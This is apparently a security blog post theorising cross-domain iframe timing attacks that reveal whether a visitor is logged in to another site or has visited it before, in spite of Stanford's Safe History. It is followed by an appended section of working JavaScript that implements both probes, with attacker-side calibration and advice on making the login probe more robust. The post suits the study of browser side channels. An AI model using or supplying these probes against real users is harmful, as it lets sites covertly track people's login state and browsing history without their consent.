Let’s think about this… If I can put a page in an iframe and detect when it has finished loading (the frame’s onload event fires for cross-domain content too), I can point it at a URL whose response time depends on the user’s state. If a page takes measurably longer to load when the user is signed in than when they aren’t (an extra database hit, personalized content, a redirect to the login form instead of the real page), timing the frame tells me which state they are in, and that is another potential way to build targeted attacks. Even assuming the CSS :visited history attack that Jeremiah came up with is blocked by something like Stanford’s Safe History, I can still tell whether the user is in an authenticated state on any site that has this timing difference, because nothing about the history protection touches how long the page takes to come back.
Since I’m on a roll talking about Stanford security today, let’s completely break Safe History by testing whether the user has been to a website before: load a resource from that site in a frame and time it, then load the exact same URL again. The second load comes out of the browser cache and should be basically instant; if the first load was already just as fast, the resource was cached before I touched it, which means the user had visited the site. Safe History only hides the :visited state of links, so it does nothing against this. Of course all of this is theory and I haven’t tested any of it, but I’ll be curious to hear people’s thoughts once they do. Cross domain restrictions seem to be getting more and more fuzzy lately.
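Both probes above (login-state timing and cache timing) need the same primitive: time how long a cross-domain iframe takes to fire onload. The following is an added example, not code from the original post, showing that primitive plus the decision logic for each probe. The URLs, the calibration numbers, the 50 ms margin and the 40 ms cache tolerance are all placeholders I made up; a real attacker would have to calibrate them against their own test account and the victim’s network.

```javascript
// Added example: cross-domain iframe timing probes. Not from the original post.
// Assumed placeholders: TARGET_URL, RESOURCE_URL and the calibration numbers below.

// Median of a sample array. Used instead of the mean so one slow outlier
// (a dropped packet, a GC pause) does not drag the estimate around.
function median(samples) {
  if (samples.length === 0) throw new Error('no samples');
  const s = [...samples].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Login-state inference. `calibration` holds the attacker's own pre-measured
// medians for the target page when logged in and when logged out (assumed to
// transfer roughly to the victim's network). The victim's median is assigned
// to whichever reference it is closer to; if it is not at least `marginMs`
// closer to one than the other, the result is reported as unknown rather than
// guessed.
function inferLoginState(targetMs, calibration, marginMs = 50) {
  const { loggedInMs, loggedOutMs } = calibration;
  const toIn = Math.abs(targetMs - loggedInMs);
  const toOut = Math.abs(targetMs - loggedOutMs);
  if (Math.abs(toIn - toOut) < marginMs) return 'unknown';
  return toIn < toOut ? 'logged-in' : 'logged-out';
}

// History inference via cache timing. `firstMs` is the first load of a
// resource, `secondMs` the immediate reload of the same URL, which is served
// from cache. If the first load was already about as fast as the cached one,
// the resource was cached before the probe ran, i.e. the user had been there.
function inferVisited(firstMs, secondMs, toleranceMs = 40) {
  return firstMs - secondMs <= toleranceMs;
}

// Browser-only primitive: time a hidden iframe from insertion to onload.
// onload fires for cross-domain documents even though their content is
// unreadable, and (in practice) even when X-Frame-Options refuses to render.
function timeFrameLoad(url, timeoutMs = 10000) {
  return new Promise((resolve, reject) => {
    const frame = document.createElement('iframe');
    frame.style.display = 'none';
    let timer;
    const finish = (fn) => { clearTimeout(timer); frame.remove(); fn(); };
    timer = setTimeout(() => finish(() => reject(new Error('timeout'))), timeoutMs);
    frame.onload = () => finish(() => resolve(performance.now() - start));
    frame.onerror = () => finish(() => reject(new Error('load error')));
    const start = performance.now();
    frame.src = url;
    document.body.appendChild(frame);
  });
}

// Login probe: several runs with a cache-busting query string (assumed to be
// ignored by the target) so every run really hits the server.
async function probeLoginState(targetUrl, calibration, runs = 5) {
  const samples = [];
  for (let i = 0; i < runs; i++) {
    const sep = targetUrl.includes('?') ? '&' : '?';
    samples.push(await timeFrameLoad(`${targetUrl}${sep}_=${Date.now()}${i}`));
  }
  const med = median(samples);
  return { samples, median: med, state: inferLoginState(med, calibration) };
}

// History probe: load the same URL twice, no cache busting.
async function probeVisited(resourceUrl) {
  const first = await timeFrameLoad(resourceUrl);
  const second = await timeFrameLoad(resourceUrl);
  return { first, second, visited: inferVisited(first, second) };
}

// Demo wiring, only when running inside a page (Node has no document).
if (typeof document !== 'undefined') {
  const TARGET_URL = 'https://example.com/account';          // placeholder
  const RESOURCE_URL = 'https://example.com/';               // placeholder
  const CALIBRATION = { loggedInMs: 650, loggedOutMs: 300 }; // made-up numbers
  probeLoginState(TARGET_URL, CALIBRATION).then(r => console.log('login', r));
  probeVisited(RESOURCE_URL).then(r => console.log('visited', r));
}
```

Two practical caveats on this example. The login probe depends on the attacker’s calibration transferring to the victim’s connection, which is the weak point; timing a same-site resource that does not vary with login state alongside the target and working with the difference would make it more robust. The cache probe assumes the resource is cacheable and that the cache is shared across sites; current browsers partition the HTTP cache by top-level site, which defeats this particular variant even though the timing primitive itself still works.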